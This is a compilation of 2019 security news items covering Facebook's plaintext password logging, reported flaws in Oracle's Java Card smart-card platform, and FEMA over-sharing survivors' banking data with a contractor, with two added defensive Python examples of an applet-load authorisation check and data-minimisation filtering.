Congrats to all the winners. The vendors involved have been privately informed of the flaws so they can be patched before anyone else finds them. Stand by for patches to arrive once they are developed. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/24/security_roundup_220319/

Facebook password crisis – what to do? [VIDEO]

Facebook has just admitted to years of problems with password hygiene by leaking plaintext passwords into logfiles by mistake.

Watch this special edition of Naked Security Live…

…we answer the questions lots of people have been asking us since we first wrote about this issue:

  • What happened?
  • Was this a blunder or was Facebook being deliberately sneaky?
  • Should I close my account because of this?
  • Is this issue connected to Facebook’s recent outage?
  • What steps should I take right now?

(Watch directly on YouTube if the video won’t play here.)

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/gQmdjFRPDSo/

Security storm brewing for Oracle Java-powered smart cards: More than a dirty dozen flaws found, fixes… er, any fixes?

Bug hunters say Oracle’s Java Card platform is host to a dozen and a half security flaws that could place smart-cards and similar embedded devices using the tech at risk of hijacking.

Adam Gowdiak, CEO of Security Explorations, said he and his team discovered and privately reported the vulnerabilities to Oracle and smart-card hardware biz Gemalto. Neither vendor has responded to a request for comment on possible updates.

Designed for things like SIM cards, payment cards, and other embedded tech, Java Card lets snippets of code, dubbed applets, run within a small memory footprint on cards and similar gadgets using the minimal processing power available in the widgets.

These applets can perform authentication checks, cryptography, and other sensitive operations within the cards, using things like secret keys stashed on the devices without having to disclose them. Oracle estimates around six billion pieces of kit use the Java Card operating system in some way, shape or form.

In an advisory describing the bugs, Gowdiak explained that the 18 different security issues found by his team would potentially open the door for everything from security bypasses to complete takeover of the gizmos. In order to exploit the flaws, a malicious applet has to be loaded into the card, perhaps by a compromised or dodgy card reader, and due to a lack of internal protections, this injected software nasty can then potentially take over the card or cause other mischief.

The bugs were verified to exist on the most current version of the platform, Java Card 3.1.

“There are ways for malformed applications loaded into a vulnerable Java Card to easily break memory safety,” Gowdiak explained. “Such a breach directly leads to the security compromise of a Java Card VM, applet firewall breach and jeopardizes security of co-existing applications.”

He went on:

Unfortunately, due to certain architectural choices from the past, it’s hard to perceive Java Card technology in terms of security … In some cases, the whole card environment can be compromised, but that’s dependent on the underlying OS / processor architecture (i.e. presence of the flat address space, isolation between tasks).

It should be emphasized that successful loading of a malicious applet into a target card requires either knowledge of the keys or existence of some other means facilitating it (a vulnerability in card OS, installed applications, exposed interfaces, etc.). Such scenarios cannot be excluded though.
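The point that applet loading is gated on key knowledge is the main mitigation an issuer controls. The following added example (not code from Security Explorations, Oracle or the article) models that gate in Python: an issuer derives a per-card load key from a master key, authorises one specific applet image for one specific card with an HMAC, and the card refuses anything that fails the check. The master key, card IDs, the "CAP" payload and the diversification formula are all constructed stand-ins, not the real GlobalPlatform scheme.

```python
import hashlib
import hmac
import secrets

# Constructed sample values: an issuer master key and two card identifiers.
MASTER_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")
CARD_A_ID = b"card-0001"
CARD_B_ID = b"card-0002"


def diversify_key(master_key: bytes, card_id: bytes) -> bytes:
    """Derive a per-card load key from the issuer master key and the card ID.

    Simplified stand-in for issuer key diversification: a load key recovered
    from one card must not unlock applet installation on any other card.
    """
    return hmac.new(master_key, b"load-key|" + card_id, hashlib.sha256).digest()


def issue_load_token(master_key: bytes, card_id: bytes, cap_bytes: bytes) -> bytes:
    """Issuer side: authorise exactly this applet image for exactly this card."""
    card_key = diversify_key(master_key, card_id)
    return hmac.new(card_key, cap_bytes, hashlib.sha256).digest()


class Card:
    """Toy model of a card's applet-install gate (hypothetical, not Java Card's loader)."""

    def __init__(self, card_id: bytes, load_key: bytes) -> None:
        self.card_id = card_id
        self._load_key = load_key
        self.installed: list[str] = []   # hashes of accepted applet images

    def install(self, cap_bytes: bytes, token: bytes) -> bool:
        # Recompute the authorisation over the exact bytes presented; any
        # modification of the image, or a token minted for another card,
        # produces a different MAC and is rejected before anything is loaded.
        expected = hmac.new(self._load_key, cap_bytes, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, token):
            return False
        self.installed.append(hashlib.sha256(cap_bytes).hexdigest())
        return True


def demo() -> dict[str, bool]:
    """Run the four cases a loader must get right; returns name -> accepted."""
    card_a = Card(CARD_A_ID, diversify_key(MASTER_KEY, CARD_A_ID))
    card_b = Card(CARD_B_ID, diversify_key(MASTER_KEY, CARD_B_ID))
    cap = b"constructed applet image, not a real CAP file"  # constructed
    token_a = issue_load_token(MASTER_KEY, CARD_A_ID, cap)
    return {
        "genuine": card_a.install(cap, token_a),
        "tampered_image": card_a.install(cap + b"\x00", token_a),
        "token_replayed_on_other_card": card_b.install(cap, token_a),
        "no_key_knowledge": card_a.install(cap, secrets.token_bytes(32)),
    }


if __name__ == "__main__":
    for case, accepted in demo().items():
        print(f"{case}: {'accepted' if accepted else 'rejected'}")
```

Only the genuine case is accepted; the other three are the situations the article describes (an altered applet, a key from a different card, no key at all) and all fail closed. The gate says nothing about what a correctly loaded applet can do afterwards, which is exactly where the reported memory-safety flaws sit, so it is a precondition, not a substitute for fixes.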

Gemalto is involved in the disclosure because one of the findings specifically impacts its GemXplore 3G V3.0-256K and 3G USIMERA Prime SIM card models.

While the vulnerabilities do pose a security risk, to realistically pull this off, you need to know which firmware is running on the target card, and its architecture. That’s not impossible to find out, of course. The vulnerabilities could provide the first step an attacker would need to perform a larger intrusion into a building or some other system. Given the high-value areas, such as finance and telecoms, where Java Card operates, such bugs could prove highly valuable should they not be properly patched.

Should a fix for the vulnerabilities come from Oracle, the most likely release date would be April 16, when Big Red’s next quarterly patch dump is scheduled. In other words, no, we’re not aware of any fixes available yet. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/22/oracles_java_card/

Uncle Sam’s disaster agency FEMA creates disaster of its own: 2.3 million survivors’ personal records spilled

Disaster relief org FEMA has admitted, conveniently on a Friday night, to accidentally leaking banking details and other personal information of 2.3 million hurricane and wildfire survivors.

The US government’s Federal Emergency Management Agency picked the end-of-the-week bad-news dump time slot to let the public know that one of its contractors had mistakenly been sent more information than it ever needed to know.

“In transferring disaster survivor information to a contractor, FEMA provided more information than was necessary,” is how the agency’s press secretary Lizzie Litzow put it today.

“Since discovery of this issue, FEMA has taken aggressive measures to correct this error. FEMA is no longer sharing unnecessary data with the contractor and has conducted a detailed review of the contractor’s information system.”

The extra personal info handed over to the contractor is said to have spanned 20 data fields, including bank transit numbers and electronic funds transfer routing numbers.
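The failure here is one of data minimisation: the transfer carried whatever fields the source system had rather than only the fields the contractor’s task needed. The following added Python example (not FEMA’s or the contractor’s code; the records, field names and the contractor’s allowed field set are all constructed) shows the two controls that catch this before the data leaves: a per-recipient field allowlist applied to every record, and a pre-transfer audit that reports any field present in the outbound data but not on that allowlist.

```python
from dataclasses import dataclass, field

# Constructed survivor records with fake values; the field names mirror the
# kinds of data the article says were over-shared (banking identifiers).
SURVIVOR_RECORDS = [
    {"case_id": "C-1001", "name": "A. Example", "address": "1 Example St",
     "disaster": "Hurricane Harvey", "bank_transit": "000000000",
     "eft_routing": "111111111", "dob": "1970-01-01"},
    {"case_id": "C-1002", "name": "B. Example", "address": "2 Example Ave",
     "disaster": "California wildfires", "bank_transit": "222222222",
     "eft_routing": "333333333", "dob": "1980-02-02"},
]

# Hypothetical: the contractor only arranges temporary lodging, so this is
# the complete set of fields its contract justifies receiving.
LODGING_CONTRACTOR_ALLOWED = frozenset({"case_id", "name", "address", "disaster"})


@dataclass
class TransferAudit:
    """What a transfer would send, and what was stripped or flagged."""
    records: list = field(default_factory=list)
    dropped_counts: dict = field(default_factory=dict)   # field -> records it was removed from
    overshared_fields: set = field(default_factory=set)  # fields found outside the allowlist


def find_overshare(records: list[dict], allowed: frozenset) -> set:
    """Detection: which fields in the outbound set are not on the allowlist?"""
    present = set()
    for rec in records:
        present.update(rec.keys())
    return present - allowed


def minimise_for_transfer(records: list[dict], allowed: frozenset) -> TransferAudit:
    """Prevention: project every record onto the allowlist and keep an audit
    of what was removed, so reviewers can see the stripped fields explicitly."""
    audit = TransferAudit()
    audit.overshared_fields = find_overshare(records, allowed)
    for rec in records:
        kept = {k: v for k, v in rec.items() if k in allowed}
        for k in rec:
            if k not in allowed:
                audit.dropped_counts[k] = audit.dropped_counts.get(k, 0) + 1
        audit.records.append(kept)
    return audit


if __name__ == "__main__":
    raw_leak = find_overshare(SURVIVOR_RECORDS, LODGING_CONTRACTOR_ALLOWED)
    print("fields that would over-share if sent as-is:", sorted(raw_leak))
    audit = minimise_for_transfer(SURVIVOR_RECORDS, LODGING_CONTRACTOR_ALLOWED)
    print("fields stripped per record:", audit.dropped_counts)
    print("records ready to send:", audit.records)
```

Running `find_overshare` on the raw extract is the check that would have flagged this transfer; running it again on the minimised output returns an empty set, which is the condition to require before any export job is allowed to proceed.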

The 2.3 million people exposed by the privacy screw-up are said to be survivors of the California wildfires, and Hurricanes Harvey, Irma, and Maria, all in 2017. If there is a bright side, so far it looks like the information did not get out into the public space.

“To date, FEMA has found no indicators to suggest survivor data has been compromised,” Litzow said.

“FEMA has also worked with the contractor to remove the unnecessary data from the system and updated its contract to ensure compliance with Department of Homeland Security (DHS) cybersecurity and information-sharing standards.”

The agency says that it has already begun working with the unnamed contractor to get the leaked information wiped off its systems, and plans to provide its employees with additional training so that the incident doesn’t happen again.

“As an added measure, FEMA instructed contracted staff to complete additional DHS [Department of Homeland Security] privacy training,” Litzow added. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/23/fema_data_loss/